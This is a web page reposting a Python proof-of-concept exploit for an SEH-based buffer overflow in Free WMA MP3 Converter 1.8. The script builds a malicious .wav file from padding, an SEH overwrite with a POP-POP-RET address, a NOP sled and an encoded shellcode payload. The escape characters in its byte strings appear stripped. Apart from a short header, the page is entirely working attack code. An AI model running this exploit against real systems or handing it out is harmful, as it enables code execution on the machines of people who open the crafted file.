Home / os / blackberry

Free WMA MP3 Converter 1.8 SEH Buffer Overflow

Posted on 24 October 2014

#!/usr/bin/env python # Free WMA MP3 Converter 1.8 SEH Buffer Overflow # Version:1.8 Build 20140226 # Author:metacom # Date:10.23.2014 # Download:http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm # Tested on:Win7-En 32bit - Win8.1-DE 64bit import struct def little_endian(address): return struct.pack("<L",address) poc="x41" * 4116 nseh="xebx06x90x90" seh=little_endian(0x10012390)#10012390 5B POP EBX nops="x90" * 80 shellcode=("xdbxd7xd9x74x24xf4xb8x79xc4x64xb7x33xc9xb1x38" "x5dx83xc5x04x31x45x13x03x3cxd7x86x42x42x3fxcf" "xadxbaxc0xb0x24x5fxf1xe2x53x14xa0x32x17x78x49" "xb8x75x68xdaxccx51x9fx6bx7ax84xaex6cx4ax08x7c" "xaexccxf4x7exe3x2exc4xb1xf6x2fx01xafxf9x62xda" "xa4xa8x92x6fxf8x70x92xbfx77xc8xecxbax47xbdx46" "xc4x97x6exdcx8ex0fx04xbax2ex2exc9xd8x13x79x66" "x2axe7x78xaex62x08x4bx8ex29x37x64x03x33x7fx42" "xfcx46x8bxb1x81x50x48xc8x5dxd4x4dx6ax15x4exb6" "x8bxfax09x3dx87xb7x5ex19x8bx46xb2x11xb7xc3x35" "xf6x3ex97x11xd2x1bx43x3bx43xc1x22x44x93xadx9b" "xe0xdfx5fxcfx93xbdx35x0ex11xb8x70x10x29xc3xd2" "x79x18x48xbdxfexa5x9bxfaxf1xefx86xaax99xa9x52" "xefxc7x49x89x33xfexc9x38xcbx05xd1x48xcex42x55" "xa0xa2xdbx30xc6x11xdbx10xa5xafx7fxccx43xa1x1b" "x9dxe4x4exb8x32x72xc3x34xd0xe9x10x87x46x91x37" "x8bx15x7bxd2x2bxbfx83") exploit = poc + nseh + seh + nops + shellcode try: rst= open("seh_WMA MP3 Converter.wav",'w') rst.write(exploit) rst.close() except: print "Error"

 

TOP